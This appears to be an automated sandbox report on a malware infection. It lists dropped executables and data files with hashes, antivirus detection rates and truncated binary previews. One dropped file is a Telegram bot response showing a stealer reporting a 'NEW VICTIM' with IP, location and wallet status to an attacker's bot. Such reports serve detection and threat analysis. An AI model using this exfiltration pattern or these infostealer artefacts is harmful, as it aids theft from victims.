                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.Gra.)!a.)!a.)!.** l.)!.*, ..)!.*- r.)!p-* s.)!p-- q.)!p-, G.)!.*( d.)!a.(!?.)!.-! `.)!.-.!`.)!.-+ `.)!Richa.)!................PE..L.....eg...............*..&.........P.#.......&...@...........................).......(...@...................................'.<.....'.}.....................(..j....'.T...........................@.'.@.............&.@............................text.....&.......&................. ..`.rdata..,.....&.......&.............@..@.data.........'.......'.............@....fptable......'.......'.............@....rsrc...}.....'.......'.............@..@.reloc...j....(..l...L(.............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):605696
                                                                                                                                                                                                                                                              Entropy (8bit):6.377818589865092
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                                                                              MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                              SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                                                                              SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                                                                              SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4438776
                                                                                                                                                                                                                                                              Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                                                              MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                              SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                                                              SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                                                              SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1845760
                                                                                                                                                                                                                                                              Entropy (8bit):7.946067586362754
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:49152:T+NXMBuWRPP95a0JzyrHZ40BegF3VQ3fZKUrz:yXMBuWk4YFlO8Ur
                                                                                                                                                                                                                                                              MD5:F417402BF33D99A0AF654DFBF7042087
                                                                                                                                                                                                                                                              SHA1:EE017B7D13F1D63E30711592B9064427C50F35FC
                                                                                                                                                                                                                                                              SHA-256:25BB6710D5481466C8C54BCE3617946451BACF6AF3BEF576368213E356DB45E6
                                                                                                                                                                                                                                                              SHA-512:85A4950867BB34BF7DA9F30D7B42D067FF4FFF1D843DF70E5F24DE2C30836881BFDF468CC672921DBC44F4D7FD4C2F47C7504828E3CCCDCA4471B3C7498DBD8B
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@..........................@I......x....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...ltyimmoj.....P/......^..............@...vmbhrkov......I.....................@....taggant.0....I.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):321
                                                                                                                                                                                                                                                              Entropy (8bit):4.99323851364312
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                                                                                                              MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                                                                                                              SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                                                                                                              SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                                                                                                              SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):21
                                                                                                                                                                                                                                                              Entropy (8bit):3.880179922675737
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:gFsR0GOWW:gyRhI
                                                                                                                                                                                                                                                              MD5:408E94319D97609B8E768415873D5A14
                                                                                                                                                                                                                                                              SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                                                                                                                                                                                                                              SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                                                                                                                                                                                                                              SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:9tKiK3bsYm4fMuK47Pk3s
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1861632
                                                                                                                                                                                                                                                              Entropy (8bit):7.947162986091251
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:49152:pXszOuMpJuVj4ozSuhfA6CFRStA4LyHY7LJAf:ezDMeVj2ICFRFOyHY7LJi
                                                                                                                                                                                                                                                              MD5:15709EBA2AFAF7CC0A86CE0ABF8E53F1
                                                                                                                                                                                                                                                              SHA1:238EBF0D386ECF0E56D0DDB60FACA0EA61939BB6
                                                                                                                                                                                                                                                              SHA-256:10BFF40A9D960D0BE3CC81B074A748764D7871208F324DE26D365B1F8EA3935A
                                                                                                                                                                                                                                                              SHA-512:65EDEFA20F0BB35BEE837951CCD427B94A18528C6E84DE222B1AA0AF380135491BB29A049009F77E66FCD2ABE5376A831D98E39055E1042CCEE889321B96E8E9
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................PI...........@...........................I.....IA....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...wekcazbo.....P/......^..............@...ttllozcv.....@I......@..............@....taggant.0...PI.."...F..............@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):4433408
                                                                                                                                                                                                                                                              Entropy (8bit):7.985707723404453
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:98304:uooeV3JSRzHmMwvfbkqPZna7ysmSbv1NFNCX0dOR:uzexJSRzHmzp2ys/xNCGOR
                                                                                                                                                                                                                                                              MD5:17830E6496A4FA2D4DC73BA36CE61725
                                                                                                                                                                                                                                                              SHA1:B5BD42C48BA9FDE8DB5C37A9E11518F3F909EAED
                                                                                                                                                                                                                                                              SHA-256:6EE8B2CF092DF2B52451C4B328D93D7ABCB48F5EBC7DC3A5AB328EA633BD1785
                                                                                                                                                                                                                                                              SHA-512:79FD3BBA3B5E30F6E864CBF5C9E9385B7B0C39A724F68975875A7ADD0F67C3EDDCFA3251EF127A2FE3F0FCE80992CAEA858A774999184AB9F22EBFEE6672EF1F
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@.................................9ID...@... ............................._.r.s.....r............................................................................................................ . ..r......4(.................@....rsrc.........r......D(.............@....idata ......r......F(.............@... ..7...r......H(.............@...wasfhoet.@.......6...J(.............@...ygjteyur..............C.............@....taggant.0......."....C.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):965120
                                                                                                                                                                                                                                                              Entropy (8bit):6.691637451833428
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:QqDEvCTbMWu7rQYlBQcBiT6rprG8aV3VPO:QTvC/MTQYxsWR7aV3VP
                                                                                                                                                                                                                                                              MD5:58F6FD6BFBBB99454234A6099D39E954
                                                                                                                                                                                                                                                              SHA1:AB1077085FFF58BA11E1C5DB664F8832DB7DCEC6
                                                                                                                                                                                                                                                              SHA-256:C82CB1D9508DA7592A716311D59FE3F095457A1E2BA71CA5BB8C6A57451928C1
                                                                                                                                                                                                                                                              SHA-512:1279A66481102D21124A78A9E435E03632FC35999463A29E761FC157E04DDDDE0E9ADB9FE5CA2176D9E379E72B5A387007F6EC3E83B34C90BEDE08C7E74E82A4
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...JZgg..........".................w.............@.................................lD....@...@.......@.....................d...|....@...N.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....N...@...P..................@..@.reloc...u.......v...D..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1502720
                                                                                                                                                                                                                                                              Entropy (8bit):7.646111739368707
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                                                                                                                                                                                                              MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                                                                                                                                                                                                              SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                                                                                                                                                                                                              SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                                                                                                                                                                                                              SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):97296
                                                                                                                                                                                                                                                              Entropy (8bit):7.9982317718947025
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                                                                                                                                                                                                                              MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                                                                                                                                                                                                                              SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                                                                                                                                                                                                                              SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                                                                                                                                                                                                                              SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):439296
                                                                                                                                                                                                                                                              Entropy (8bit):6.4903731089009495
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12288:v4RG6lx/9Njr18QlSfJy4FjMSkJCzDLGDWD:O9NtSTZMzmmD4
                                                                                                                                                                                                                                                              MD5:51FF79B406CB223DD49DD4C947EC97B0
                                                                                                                                                                                                                                                              SHA1:B9B0253480A1B6CBDD673383320FECAE5EFB3DCE
                                                                                                                                                                                                                                                              SHA-256:2E3A5DFA44D59681A60D78B8B08A1AF3878D8E270C02D7E31A0876A85EB42A7E
                                                                                                                                                                                                                                                              SHA-512:C2B8D15B0DC1B0846F39CE007BE2DEB41D5B6AE76AF90D618F29DA8691ED987C42F3C270F0EA7F4D10CBD2D3877118F4133803C9C965B6FF236FF8CFAFD9367C
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L....3dg............................'.............@..........................0............@..................................E...................................E......8...............................@...............<............................text...j........................... ..`.rdata...H.......J..................@..@.data....m...`...,...@..............@....rsrc................l..............@..@.reloc...E.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1959936
                                                                                                                                                                                                                                                              Entropy (8bit):7.94126932718358
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:49152:AzXj2IxFyhnVCQxf1xpWkD2heruPYgW597Ky:AnNxFSVnfDs028aPYg2My
                                                                                                                                                                                                                                                              MD5:63941836D5C054B13AE7B96F743C38CB
                                                                                                                                                                                                                                                              SHA1:194FCA3EFEB1C402150A20CBB78222E779319011
                                                                                                                                                                                                                                                              SHA-256:C18EE07AD8E0958F78B1C943CF49923B8C18E7A2851730325D1FF40F0DA3D033
                                                                                                                                                                                                                                                              SHA-512:06ED190D98D3B9B20785EA2AE2C2A787C209E6DD34F3DEB0254E5B092DD16CEB48AE2185FE9F943A3145E2683707530057C4C3FC4B9B9C719D2295B3BBD4E8E3
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@.......0............@..........................`..............................................[.A.o.....@............................................................................................................. . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..)...A.....................@...tsdsdsrb.....0k.....................@...qtylzonp..... ......................@....taggant.0...0..."..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):2809344
                                                                                                                                                                                                                                                              Entropy (8bit):6.477052744116312
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:49152:QfYy9jPgXFxLSsM6FN8+c6aoflDx31DXZdCQS:QfYy9jYXFtSsDFU6T5HnCQ
                                                                                                                                                                                                                                                              MD5:1F915A2A7DD42C289E8782993830F2A4
                                                                                                                                                                                                                                                              SHA1:DE26B9563EE852705764D2F0144BABB2386EEB00
                                                                                                                                                                                                                                                              SHA-256:BF28DB1E7F9E26CC3A8E9184B031257300AC975C8E51A76C7F5C4A8600D598CA
                                                                                                                                                                                                                                                              SHA-512:EF2886D7D651CAD6A89BF7ADF946653D83E7A37E4453E795A81FD269135159043BCBB9188C6101E4B3F9AEF9A2612169678AB935FDAB4BAA2D5792CA2121B29F
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... +.. ...`....@.. .......................`+......G+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...osxguznn.`*......P*..h..............@...nksckbfu. ....+.......*.............@....taggant.@... +.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):777
                                                                                                                                                                                                                                                              Entropy (8bit):5.1096112526781425
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:24:YKOHwy1JVBa4YGQVPe071kW6PyoZEB6casJENBm9c:YVHwQTBj/Q51OPtZAujMc
                                                                                                                                                                                                                                                              MD5:1DA944F01BF26191CD3C9AD09CB3CA0A
                                                                                                                                                                                                                                                              SHA1:3C95F9913705A5B58FBBF0B633C8AC228AEE4A1B
                                                                                                                                                                                                                                                              SHA-256:4AA7FA0EC20194A8D16D1B3EDEF508C9638ECD1C9F3EE0566924909EC4CE6A4A
                                                                                                                                                                                                                                                              SHA-512:9F3174C81CE06AAED87ABDFB0A2DA1D21DA97564AD4C323E554462DD52B25DE65A7B04BC3486E7D82417FFE2EFC9B794E77B97610E563CB739012961006C4C92
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:{"ok":true,"result":{"message_id":30111,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734830220,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 715575\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:V:V
                                                                                                                                                                                                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:0
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):242176
                                                                                                                                                                                                                                                              Entropy (8bit):6.47050397947197
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                                                                                                                                                                                                                              MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                                                                                                                                                                                                                              SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                                                                                                                                                                                                                              SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                                                                                                                                                                                                                              SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Reputation:unknown
